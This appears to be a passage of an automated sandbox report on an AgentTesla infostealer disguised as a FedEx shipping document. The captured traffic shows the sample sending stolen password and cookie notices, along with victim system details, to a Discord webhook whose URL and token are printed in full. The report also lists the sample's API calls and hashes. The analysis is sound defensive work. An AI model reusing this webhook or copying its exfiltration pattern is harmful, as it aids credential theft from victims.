                                                                                      Mar 20, 2023 11:52:06.440745115 CET49702443192.168.2.7162.159.135.232

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 20, 2023 11:51:49.083699942 CET5947753192.168.2.78.8.8.8
                                                                                      Mar 20, 2023 11:51:49.103337049 CET53594778.8.8.8192.168.2.7
                                                                                      Mar 20, 2023 11:51:49.115154028 CET5575253192.168.2.78.8.8.8
                                                                                      Mar 20, 2023 11:51:49.135409117 CET53557528.8.8.8192.168.2.7
                                                                                      Mar 20, 2023 11:52:04.919559956 CET5033053192.168.2.78.8.8.8
                                                                                      Mar 20, 2023 11:52:04.941693068 CET53503308.8.8.8192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.979279041 CET5658853192.168.2.78.8.8.8
                                                                                      Mar 20, 2023 11:52:06.000864029 CET53565888.8.8.8192.168.2.7

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Mar 20, 2023 11:51:49.083699942 CET192.168.2.78.8.8.80xd371Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.115154028 CET192.168.2.78.8.8.80x7dd7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:04.919559956 CET192.168.2.78.8.8.80x8554Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:05.979279041 CET192.168.2.78.8.8.80xf5aeStandard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • api.ipify.org
                                                                                      • discord.com

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.74970064.185.227.155443C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 10:51:58 UTC0OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: api.ipify.org
                                                                                      Connection: Keep-Alive


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.749701162.159.138.232443C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 10:52:05 UTC0OUTPOST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1ed
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: discord.com
                                                                                      Content-Length: 1217
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2023-03-20 10:52:05 UTC0INHTTP/1.1 100 Continue
                                                                                      2023-03-20 10:52:05 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 36 32 65 32 30 35 66 38 32 66 64 34 30 63 38 61 39 35 36 65 36 39 64 31 62 63 64 65 31 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 66 72 6f 6e 74 64 65 73 6b 2d 31 32 38 37 35 37 20 32 30 32 33 2d 30 33 2d 32 30 20 32 30 2d 31 31 2d 31 33 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 36 32 65 32 30 35 66 38 32 66 64 34 30 63 38 61 39 35 36 65 36 39 64 31 62 63 64 65 31 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                      Data Ascii: ------------f62e205f82fd40c8a956e69d1bcde1edContent-Disposition: form-data; name="filename"user-128757 2023-03-20 20-11-13.html------------f62e205f82fd40c8a956e69d1bcde1edContent-Disposition: form-data; name="fileformat"html----------
                                                                                      2023-03-20 10:52:05 UTC1INHTTP/1.1 200 OK
                                                                                      Date: Mon, 20 Mar 2023 10:52:05 GMT
                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      set-cookie: __dcfduid=40c5656cc70d11edb0c39210813c6258; Expires=Sat, 18-Mar-2028 10:52:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                      x-ratelimit-limit: 5
                                                                                      x-ratelimit-remaining: 4
                                                                                      x-ratelimit-reset: 1679309526
                                                                                      x-ratelimit-reset-after: 1
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y0BSRKb27zSropPzt%2Bg6Z2X4UEhJRQk8Bj2YvlMJS8AfkifTFWNGMfjw4oHWaNjxINrmBp46whbhVKRsouDeaP5B5q%2Bum2dhRkhGSHkQ4J43Rffu%2FD9s5Y5Zfpiy"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Set-Cookie: __sdcfduid=40c5656cc70d11edb0c39210813c62587ea41797631d80b0eb81fb5fb59f040505ee2c8191420557b081c2ad7edc3c28; Expires=Sat, 18-Mar-2028 10:52:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      Set-Cookie: __cfruid=5019ff0ae1936eba3cb560abc34fa003b3655eb0-1679309525; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 7aad6753997f085b-FRA
                                                                                      442
                                                                                      {"id": "10873276996
                                                                                      2023-03-20 10:52:05 UTC3INData Raw: 35 33 31 31 31 38 31 30 22 2c 20 22 74 79 70 65 22 3a 20 30 2c 20 22 63 6f 6e 74 65 6e 74 22 3a 20 22 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 5c 6e 5c 6e 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 32 30 3a 31 31 3a 31 33 5c 6e 55 73 65 72 20 4e 61 6d 65 3a 20 66 72 6f 6e 74 64 65 73 6b 2f 31 32 38 37 35 37 5c 6e 4f 53 46 75 6c 6c 4e 61 6d 65 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 52 41 4d 3a 20 38 31 39 31 2e 32 35 20 4d 42 5c 6e 49 50 20 41 64 64 72 65 73 73 3a 22 2c 20 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 20 22 31 30 38 35 39 36 30 39 38 34 30 37 31 35 32
                                                                                      Data Ascii: 53111810", "type": 0, "content": "New PW Recovered!\n\nTime: 03/20/2023 20:11:13\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address:", "channel_id": "108596098407152
                                                                                      2023-03-20 10:52:05 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.749702162.159.135.232443C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 10:52:06 UTC4OUTPOST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----------8b7e5ceedd2047309d0db2508590a0cd
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: discord.com
                                                                                      Content-Length: 2002
                                                                                      Expect: 100-continue
                                                                                      2023-03-20 10:52:06 UTC4INHTTP/1.1 100 Continue
                                                                                      2023-03-20 10:52:06 UTC4OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 62 37 65 35 63 65 65 64 64 32 30 34 37 33 30 39 64 30 64 62 32 35 30 38 35 39 30 61 30 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 66 72 6f 6e 74 64 65 73 6b 2d 31 32 38 37 35 37 20 32 30 32 33 2d 30 33 2d 32 30 20 32 32 2d 33 30 2d 34 34 2e 7a 69 70 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 62 37 65 35 63 65 65 64 64 32 30 34 37 33 30 39 64 30 64 62 32 35 30 38 35 39 30 61 30 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 7a 69 70 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                      Data Ascii: ------------8b7e5ceedd2047309d0db2508590a0cdContent-Disposition: form-data; name="filename"user-128757 2023-03-20 22-30-44.zip------------8b7e5ceedd2047309d0db2508590a0cdContent-Disposition: form-data; name="fileformat"zip------------
                                                                                      2023-03-20 10:52:06 UTC6INHTTP/1.1 200 OK
                                                                                      Date: Mon, 20 Mar 2023 10:52:06 GMT
                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      set-cookie: __dcfduid=416011b6c70d11edb536760b3bcdf2c3; Expires=Sat, 18-Mar-2028 10:52:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                      x-ratelimit-limit: 5
                                                                                      x-ratelimit-remaining: 4
                                                                                      x-ratelimit-reset: 1679309527
                                                                                      x-ratelimit-reset-after: 1
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OULjCI%2F1N55yjSCOGXM8Y%2FxHMpSBWVpW8%2FwwbhhWxOTTi%2BUEvHDCdTOwV9ULOH1gbtIw4dw4oEWRDWgOzn3tNgUpj9gep8yovhl2UnE1M5w0U%2B0M%2B5R0qRItF%2F3e"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Set-Cookie: __sdcfduid=416011b6c70d11edb536760b3bcdf2c31926f826f620e903433f2215b6d2f998ca16186ab205ab9b49458d3f841b5914; Expires=Sat, 18-Mar-2028 10:52:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      Set-Cookie: __cfruid=5ba988da0ff0fc085ce4e493a530e21de7d0e050-1679309526; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 7aad675a2dba360b-FRA
                                                                                      437
                                                                                      {"id": "108
                                                                                      2023-03-20 10:52:06 UTC7INData Raw: 37 33 32 37 37 30 34 31 37 30 33 36 39 30 36 35 22 2c 20 22 74 79 70 65 22 3a 20 30 2c 20 22 63 6f 6e 74 65 6e 74 22 3a 20 22 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 5c 6e 5c 6e 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 32 32 3a 33 30 3a 34 34 5c 6e 55 73 65 72 20 4e 61 6d 65 3a 20 66 72 6f 6e 74 64 65 73 6b 2f 31 32 38 37 35 37 5c 6e 4f 53 46 75 6c 6c 4e 61 6d 65 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 52 41 4d 3a 20 38 31 39 31 2e 32 35 20 4d 42 5c 6e 49 50 20 41 64 64 72 65 73 73 3a 22 2c 20 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 20 22 31 30 38 35 39 36 30
                                                                                      Data Ascii: 7327704170369065", "type": 0, "content": "New CO Recovered!\n\nTime: 03/20/2023 22:30:44\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address:", "channel_id": "1085960
                                                                                      2023-03-20 10:52:06 UTC8INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:11:51:39
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      Imagebase:0xe70000
                                                                                      File size:746496 bytes
                                                                                      MD5 hash:5CF87A160007A5E6C7A4D24E1D831327
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:11:51:46
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      Imagebase:0xac0000
                                                                                      File size:746496 bytes
                                                                                      MD5 hash:5CF87A160007A5E6C7A4D24E1D831327
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:108
                                                                                        Total number of Limit Nodes:7
                                                                                        execution_graph 13458 184c310 GetCurrentProcess 13459 184c383 13458->13459 13460 184c38a GetCurrentThread 13458->13460 13459->13460 13461 184c3c7 GetCurrentProcess 13460->13461 13462 184c3c0 13460->13462 13463 184c3fd 13461->13463 13462->13461 13464 184c425 GetCurrentThreadId 13463->13464 13465 184c456 13464->13465 13466 184c940 13467 184c945 DuplicateHandle 13466->13467 13468 184c9d6 13467->13468 13469 18440d0 13470 18440e2 13469->13470 13471 18440ee 13470->13471 13475 18441e0 13470->13475 13480 1843c64 13471->13480 13473 184410d 13476 1844205 13475->13476 13484 18442d0 13476->13484 13488 18442e0 13476->13488 13481 1843c6f 13480->13481 13496 18451a4 13481->13496 13483 1847241 13483->13473 13486 18442e0 13484->13486 13485 18443e4 13485->13485 13486->13485 13492 1843de8 13486->13492 13490 1844307 13488->13490 13489 18443e4 13489->13489 13490->13489 13491 1843de8 CreateActCtxA 13490->13491 13491->13489 13493 1845370 CreateActCtxA 13492->13493 13495 1845433 13493->13495 13497 18451af 13496->13497 13500 1846dc0 13497->13500 13499 184784d 13499->13483 13501 1846dcb 13500->13501 13504 1846df0 13501->13504 13503 1847922 13503->13499 13505 1846dfb 13504->13505 13508 1846e20 13505->13508 13507 1847a22 13507->13503 13509 1846e2b 13508->13509 13511 184813e 13509->13511 13514 1849ef8 13509->13514 13510 184817c 13510->13507 13511->13510 13519 184c038 13511->13519 13515 1849efd 13514->13515 13524 1849f20 13515->13524 13530 1849f30 13515->13530 13516 1849f0e 13516->13511 13520 184c069 13519->13520 13523 184c08d 13520->13523 13562 184c1e8 13520->13562 13566 184c1f8 13520->13566 13523->13510 13525 1849ef1 13524->13525 13526 1849f2e 13524->13526 13525->13516 13534 184a017 13526->13534 13542 184a028 13526->13542 13527 1849f3f 13527->13516 13532 184a017 2 API calls 13530->13532 13533 184a028 2 API calls 13530->13533 13531 1849f3f 13531->13516 13532->13531 13533->13531 13535 184a03b 13534->13535 13536 184a053 13535->13536 13550 184a2a0 13535->13550 13554 184a2b0 13535->13554 13536->13527 13537 184a250 GetModuleHandleW 13539 184a27d 13537->13539 13538 184a04b 13538->13536 13538->13537 13539->13527 13543 184a03b 13542->13543 13544 184a053 13543->13544 13548 184a2a0 LoadLibraryExW 13543->13548 13549 184a2b0 LoadLibraryExW 13543->13549 13544->13527 13545 184a250 GetModuleHandleW 13547 184a27d 13545->13547 13546 184a04b 13546->13544 13546->13545 13547->13527 13548->13546 13549->13546 13551 184a2b0 13550->13551 13552 184a2e9 13551->13552 13558 18493d8 13551->13558 13552->13538 13555 184a2c4 13554->13555 13556 18493d8 LoadLibraryExW 13555->13556 13557 184a2e9 13555->13557 13556->13557 13557->13538 13559 184a490 LoadLibraryExW 13558->13559 13561 184a509 13559->13561 13561->13552 13564 184c1f8 13562->13564 13563 184c23f 13563->13523 13564->13563 13570 184a9c4 13564->13570 13568 184c205 13566->13568 13567 184c23f 13567->13523 13568->13567 13569 184a9c4 3 API calls 13568->13569 13569->13567 13571 184a9c9 13570->13571 13572 184cf38 13571->13572 13574 184c574 13571->13574 13575 184c57f 13574->13575 13576 1846e20 3 API calls 13575->13576 13577 184cfa7 13576->13577 13581 184ed18 13577->13581 13587 184ed30 13577->13587 13578 184cfe0 13578->13572 13582 184ed23 13581->13582 13583 184ec9d 13581->13583 13584 184ed6d 13582->13584 13585 184f1b0 LoadLibraryExW GetModuleHandleW 13582->13585 13586 184f19f LoadLibraryExW GetModuleHandleW 13582->13586 13583->13578 13584->13578 13585->13584 13586->13584 13589 184ed61 13587->13589 13590 184edad 13587->13590 13588 184ed6d 13588->13578 13589->13588 13591 184f1b0 LoadLibraryExW GetModuleHandleW 13589->13591 13592 184f19f LoadLibraryExW GetModuleHandleW 13589->13592 13590->13578 13591->13590 13592->13590

                                                                                        Executed Functions

                                                                                        Function 0184C300 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C370
                                                                                        • GetCurrentThread.KERNEL32 ref: 0184C3AD
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C3EA
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0184C443
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: e9816d0853fd53e9ea1f5e473d438276abe010f98fa0cbb61aca5c320ee58997
                                                                                        • Instruction ID: b0cd9baea88461da73f7f74c7f468d3459dabacaf970c257e27274b489f41409
                                                                                        • Opcode Fuzzy Hash: e9816d0853fd53e9ea1f5e473d438276abe010f98fa0cbb61aca5c320ee58997
                                                                                        • Instruction Fuzzy Hash: 4E5174B09012498FDB14CFAADA48B9EBFF4BF49310F24855AE109B7251DB349A84CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184C310 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C370
                                                                                        • GetCurrentThread.KERNEL32 ref: 0184C3AD
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C3EA
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0184C443
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: e34f7aac34254d8a43fc6eca3b203c608ed40ea9a2f57c2d3eb40f77530b8c26
                                                                                        • Instruction ID: a38bf65dc0f1a42b27889963dd827a34e9c3f9a687c25af8a577cc4056f5da4e
                                                                                        • Opcode Fuzzy Hash: e34f7aac34254d8a43fc6eca3b203c608ed40ea9a2f57c2d3eb40f77530b8c26
                                                                                        • Instruction Fuzzy Hash: 545154B09012098FDB14CFAADA48BDEBBF4BF49314F20855AE109B7350DB349A84CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184A028 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 39 184a028-184a030 40 184a03b-184a03d 39->40 41 184a036 call 1849370 39->41 42 184a053-184a057 40->42 43 184a03f 40->43 41->40 44 184a059-184a063 42->44 45 184a06b-184a0ac 42->45 95 184a045 call 184a2a0 43->95 96 184a045 call 184a2b0 43->96 44->45 50 184a0ae-184a0b6 45->50 51 184a0b9-184a0c7 45->51 46 184a04b-184a04d 46->42 48 184a188-184a248 46->48 88 184a250-184a27b GetModuleHandleW 48->88 89 184a24a-184a24d 48->89 50->51 52 184a0c9-184a0ce 51->52 53 184a0eb-184a0ed 51->53 56 184a0d0-184a0d7 call 184937c 52->56 57 184a0d9 52->57 55 184a0f0-184a0f7 53->55 60 184a104-184a10b 55->60 61 184a0f9-184a101 55->61 58 184a0db-184a0e9 56->58 57->58 58->55 64 184a10d-184a115 60->64 65 184a118-184a121 call 184938c 60->65 61->60 64->65 70 184a123-184a12b 65->70 71 184a12e-184a133 65->71 70->71 72 184a135-184a13c 71->72 73 184a151-184a155 71->73 72->73 75 184a13e-184a14e call 184939c call 18493ac 72->75 93 184a158 call 184a580 73->93 94 184a158 call 184a5a8 73->94 75->73 77 184a15b-184a15e 80 184a160-184a17e 77->80 81 184a181-184a187 77->81 80->81 90 184a284-184a298 88->90 91 184a27d-184a283 88->91 89->88 91->90 93->77 94->77 95->46 96->46
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0184A26E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: df14494e2cb82d16df9d7830d82e91b4da099002ebd0d2a81caedb97c88767b8
                                                                                        • Instruction ID: 46a479b035178dca1ce1ef57f9d1ad799e9eca089415f6503235e252edc2790d
                                                                                        • Opcode Fuzzy Hash: df14494e2cb82d16df9d7830d82e91b4da099002ebd0d2a81caedb97c88767b8
                                                                                        • Instruction Fuzzy Hash: 64713470A00B098FDB68DF6AD45075ABBF1BF88304F008A2ED44ADBA50DB35E945CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01845364 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 97 1845364-184536e 98 1845370-1845431 CreateActCtxA 97->98 100 1845433-1845439 98->100 101 184543a-1845494 98->101 100->101 108 1845496-1845499 101->108 109 18454a3-18454a7 101->109 108->109 110 18454b8 109->110 111 18454a9-18454b5 109->111 113 18454b9 110->113 111->110 113->113
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01845421
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 37276ba6ab409296be4cff5dfb137a83c180f6059b6eabe4c621d90a6a2d22c4
                                                                                        • Instruction ID: 8c0935aa872af675e3362b91a22d17aadd93bef391dd367d353a1b9a9ea9cb04
